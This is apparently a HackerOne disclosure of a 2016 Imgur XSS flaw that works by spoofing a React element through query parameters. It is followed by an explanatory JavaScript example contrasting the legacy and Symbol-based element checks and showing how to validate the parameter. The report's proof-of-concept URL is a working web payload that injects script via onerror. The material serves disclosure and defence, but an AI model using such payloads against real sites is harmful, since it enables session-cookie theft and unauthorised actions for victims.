Imgur: XSS via React element spoofing

2016-03-18T15:20:28
ID H1:124277
Type hackerone
Reporter jouko
Modified 2016-03-23T23:11:47

Description

Hello, I noticed an XSS on imgur. Proof of concept: visit the URL

http://imgur.com/vidgif/ticket/aaaaaaaa?error[props][dangerouslySetInnerHTML][__html]=%3Cimg%20src=a%20onerror=%22alert(%27XSS%20on%20%27%2bdocument.domain)%22%3E&error[_isReactElement]=true&error[type]=body

It's not the simplest case as it requires some React magic. There is a good explanation of this type of vulnerability at http://danlec.com/blog/xss-via-a-spoofed-react-element . Corresponding H1 report: https://hackerone.com/reports/49652 .

The impact is as usual. The attacker could execute operations on behalf of the victim who visits a malicious link, or access e.g. the session cookie (IMGURSESSION).

I haven't yet checked if this is the only such occurrence on Imgur.
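Added example (not code from the report, from Imgur or from React itself): it shows how a bracket-style query string like the one in the report becomes a nested object, why a truthiness check on a plain `_isReactElement` flag (the legacy React check) accepts that object, why a Symbol-based `$$typeof` check (the approach later React versions adopted) cannot be satisfied by deserialized data, and a simple application-side validation of the `error` parameter. The query string, the mini-parser and the function names are constructed for this example; the markup used is inert.

```javascript
// Symbol that only in-process code can create; JSON.parse and query-string
// parsers yield strings, numbers, booleans and plain objects, never Symbols.
const REACT_ELEMENT_TYPE = Symbol.for('react.element');

// Minimal parser for `a[b][c]=v` keys, in the style of qs-like libraries (constructed).
function parseBracketQuery(query) {
  const out = {};
  for (const pair of query.split('&')) {
    const [rawKey, rawVal = ''] = pair.split('=');
    const keys = decodeURIComponent(rawKey).match(/[^\[\]]+/g) || [];
    let cur = out;
    keys.forEach((k, i) => {
      if (i === keys.length - 1) cur[k] = decodeURIComponent(rawVal);
      else cur = cur[k] = cur[k] || {};
    });
  }
  return out;
}

// Legacy-style check: any truthy flag on a plain object passes, so the
// string "true" coming from a query string is enough.
function legacyIsElement(value) {
  return !!(value && typeof value === 'object' && value._isReactElement);
}

// Symbol-based check: a deserialized object can at best carry the string
// "Symbol(react.element)", which is not strictly equal to the Symbol.
function modernIsElement(value) {
  return !!(value && typeof value === 'object' && value.$$typeof === REACT_ELEMENT_TYPE);
}

// Application-side validation: `error` is meant to be a message, so anything
// that is not a string is dropped before it reaches a component.
function errorMessageFrom(params) {
  return typeof params.error === 'string' ? params.error : '';
}

// Constructed query mirroring the parameter shape in the report, with inert markup.
const SAMPLE_QUERY =
  'error[props][dangerouslySetInnerHTML][__html]=%3Cb%3Einjected%3C%2Fb%3E' +
  '&error[_isReactElement]=true&error[type]=body';

const params = parseBracketQuery(SAMPLE_QUERY);
console.log('legacy check accepts spoof:', legacyIsElement(params.error)); // true
console.log('symbol check accepts spoof:', modernIsElement(params.error)); // false
console.log('validated message:', JSON.stringify(errorMessageFrom(params))); // ""
```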